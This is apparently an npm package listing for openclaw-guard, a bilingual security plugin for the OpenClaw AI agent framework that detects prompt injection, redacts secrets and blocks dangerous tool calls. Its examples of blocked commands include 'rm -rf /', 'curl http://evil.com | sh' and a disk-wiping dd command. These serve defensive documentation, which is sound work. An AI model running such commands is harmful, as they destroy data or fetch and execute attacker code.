openclaw-guard
Advanced tools
First bilingual (EN/ZH) security plugin for OpenClaw — injection detection, dangerous operation blocking, PII/secret redaction, audit logging
First bilingual (EN/ZH) security plugin for OpenClaw — prompt injection detection, dangerous operation blocking, PII/secret redaction, audit logging.
ClawGuard protects your OpenClaw agent with 8 defense layers:
| Layer | Name | Hook | What it does |
|---|---|---|---|
| L1 | Prompt Guard | before_prompt_build | Injects security rules + canary token into system prompt |
| L2 | Output Scanner | tool_result_persist | Redacts API keys, private keys, PII from tool output |
| L3 | Tool Blocker | before_tool_call | Blocks dangerous commands (rm -rf /, curl | sh, etc.) |
| L4 | Input Auditor | before_tool_call + message_received | Detects prompt injection attacks (EN + ZH) |
| L5 | Security Gate | registerTool | Defense-in-depth — agent must call clawguard_check before risky operations |
| L6 | Outbound Guard | message_sending | Redacts PII from LLM responses + detects system prompt leaks via canary |
| L7 | Data Flow Guard | after_tool_call + before_tool_call | Blocks data exfiltration chains (read file → send to network) |
| L8 | Session Guard | session_end + subagent_spawning | Session security audit + subagent monitoring |
enforce (block + log) or audit (log only)One-click install (recommended):
# Linux / macOS
curl -fsSL https://raw.githubusercontent.com/jnMetaCode/clawguard/main/install.sh | bash
# Windows PowerShell
irm https://raw.githubusercontent.com/jnMetaCode/clawguard/main/install.ps1 | iex
Or install manually:
openclaw plugins install clawguard
# Or via npm
npm install openclaw-guard
openclaw plugins install ./node_modules/openclaw-guard
In your OpenClaw settings, configure the clawguard plugin:
{
"mode": "enforce",
"locale": "auto",
"layers": {
"promptGuard": true,
"outputScanner": true,
"toolBlocker": true,
"inputAuditor": true,
"securityGate": true
},
"injectionThreshold": 60
}
| Option | Values | Default | Description |
|---|---|---|---|
mode | enforce / audit | enforce | enforce blocks + logs; audit only logs |
locale | auto / zh / en | auto | auto detects from system LANG |
layers.* | true / false | all true | Enable/disable individual layers |
injectionThreshold | 0-100 | 60 | Risk score threshold for injection blocking |
Logs are written to ~/.openclaw/clawguard/audit.jsonl:
{"ts":"2026-03-11T10:00:00.000Z","mode":"enforce","level":"CRITICAL","layer":"L3","action":"block","detail":"Dangerous command: rm -rf /","tool":"Bash","pattern":"rm_rf_root"}
{"ts":"2026-03-11T10:00:01.000Z","mode":"enforce","level":"HIGH","layer":"L2","action":"redact","detail":"OpenAI API Key: 1 occurrence(s)","tool":"Read","pattern":"openai_key"}
Query with standard tools:
# View all blocked actions
grep '"action":"block"' ~/.openclaw/clawguard/audit.jsonl
# View critical events
grep '"level":"CRITICAL"' ~/.openclaw/clawguard/audit.jsonl | jq .
# Count events by layer
jq -r '.layer' ~/.openclaw/clawguard/audit.jsonl | sort | uniq -c
User Input
│
▼
┌─────────────────────┐
│ L1 Prompt Guard │ Injects security rules + canary token
│ (before_prompt_build)│ into system prompt (cached)
└─────────────────────┘
│
▼
┌─────────────────────┐
│ L4 Input Auditor │ Scans messages for injection patterns
│ (message_received) │ and hidden Unicode characters
└─────────────────────┘
│
▼
Agent decides to call a tool
│
▼
┌─────────────────────┐
│ L5 Security Gate │ Agent calls clawguard_check
│ (registerTool) │ Returns ALLOWED or DENIED
└─────────────────────┘
│
▼
┌─────────────────────┐
│ L3 Tool Blocker │ Hard block on dangerous commands/paths
│ L4 Input Auditor │ Injection check on tool arguments
│ L7 Data Flow Guard │ Block data exfiltration chains
│ (before_tool_call) │ Returns { block: true } if dangerous
└─────────────────────┘
│
▼
Tool executes
│
▼
┌─────────────────────┐
│ L7 Data Flow Guard │ Track sensitive file reads
│ (after_tool_call) │ for exfiltration detection
└─────────────────────┘
│
▼
┌─────────────────────┐
│ L2 Output Scanner │ Redacts secrets/PII from output
│ (tool_result_persist)│ before it's saved to conversation
└─────────────────────┘
│
▼
┌─────────────────────┐
│ L6 Outbound Guard │ Redacts PII from LLM responses
│ (message_sending) │ + detects canary token leaks
└─────────────────────┘
│
▼
┌─────────────────────┐
│ L8 Session Guard │ Session security audit
│ (session_end + │ + subagent monitoring
│ subagent_spawning) │
└─────────────────────┘
ClawGuard registers 5 slash commands for quick security operations:
| Command | Description |
|---|---|
/security | Full security status overview (layers, audit stats, system checks) |
/audit [count] [filter] | View audit log. Filter: block, redact, critical, high |
/harden | Scan for security issues. Use /harden fix to auto-fix permissions |
/scan-plugins | Scan installed plugins for malicious code patterns |
/check-updates | Check OpenClaw version and known vulnerabilities |
ClawGuard protects at the application layer. For full security, also implement:
127.0.0.1, use reverse proxy with auth--cap-drop=ALL, --read-only, non-root user.envUse /security-guide skill for a guided interactive security assessment.
Apache-2.0
ClawGuard 通过 8 层防御保护你的 OpenClaw 智能体:
| 层 | 名称 | Hook | 作用 |
|---|---|---|---|
| L1 | 安全提示注入 | before_prompt_build | 向系统提示注入安全规则 + Canary 令牌 |
| L2 | 输出脱敏 | tool_result_persist | 自动脱敏 API 密钥、私钥、PII |
| L3 | 工具拦截 | before_tool_call | 拦截危险命令(rm -rf /、curl | sh 等) |
| L4 | 输入审计 | before_tool_call + message_received | 中英文提示词注入检测 |
| L5 | 安全门 | registerTool | 纵深防御 — Agent 执行危险操作前必须调用检查 |
| L6 | 回复脱敏 | message_sending | 脱敏 LLM 回复中的敏感信息 + Canary 泄露检测 |
| L7 | 数据流监控 | after_tool_call + before_tool_call | 阻止数据外泄链(读文件→发网络) |
| L8 | 会话安全 | session_end + subagent_spawning | 会话安全审计 + 子 Agent 监控 |
enforce(拦截+记录)或 audit(仅记录)一键安装(推荐):
# Linux / macOS
curl -fsSL https://raw.githubusercontent.com/jnMetaCode/clawguard/main/install.sh | bash
# Windows PowerShell
irm https://raw.githubusercontent.com/jnMetaCode/clawguard/main/install.ps1 | iex
手动安装:
openclaw plugins install clawguard
{
"mode": "enforce",
"locale": "auto",
"injectionThreshold": 60
}
| 选项 | 值 | 默认 | 说明 |
|---|---|---|---|
mode | enforce / audit | enforce | enforce 拦截+记录;audit 仅记录 |
locale | auto / zh / en | auto | auto 根据系统 LANG 自动检测 |
injectionThreshold | 0-100 | 60 | 注入检测风险评分阈值 |
敏感数据脱敏:
sk-abc123... → [REDACTED:OpenAI Key]330102199001011234 → [REDACTED:身份证号]13812345678 → [REDACTED:手机号]6225880137654321 → [REDACTED:银行卡号]注入攻击检测:
危险命令拦截:
rm -rf / → 拦截curl http://evil.com | sh → 拦截dd if=/dev/zero of=/dev/sda → 拦截ClawGuard 注册了 5 个斜杠命令,用于快速安全操作:
| 命令 | 说明 |
|---|---|
/security | 安全状态总览(防御层、审计统计、系统检查) |
/audit [数量] [过滤] | 查看审计日志。过滤: block、redact、critical、high |
/harden | 扫描安全问题。使用 /harden fix 自动修复权限 |
/scan-plugins | 扫描已安装插件的恶意代码模式 |
/check-updates | 检查 OpenClaw 版本和已知漏洞 |
ClawGuard 在应用层提供保护。完整安全还需配合:
127.0.0.1,使用带认证的反向代理--cap-drop=ALL、--read-only、非 root 用户.env 中明文存储密钥使用 /security-guide 技能获取交互式安全评估指导。
Apache-2.0
FAQs
First bilingual (EN/ZH) security plugin for OpenClaw — injection detection, dangerous operation blocking, PII/secret redaction, audit logging
We found that openclaw-guard demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 1 open source maintainer collaborating on the project.
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Research
/Security News
A mini Shai-Hulud campaign compromised Red Hat Cloud Services npm packages to steal developer and CI/CD secrets during installation.
Research
/Security News
The North Korean malware loader hides in a Packagist-listed package and its GitHub branch to fetch and execute remote code in a likely Contagious Interview-style lure.
Security News
The Rust project is moving toward formal rules on LLM use in contributions after months of internal debate over maintainer burden, code quality, and contributor experience.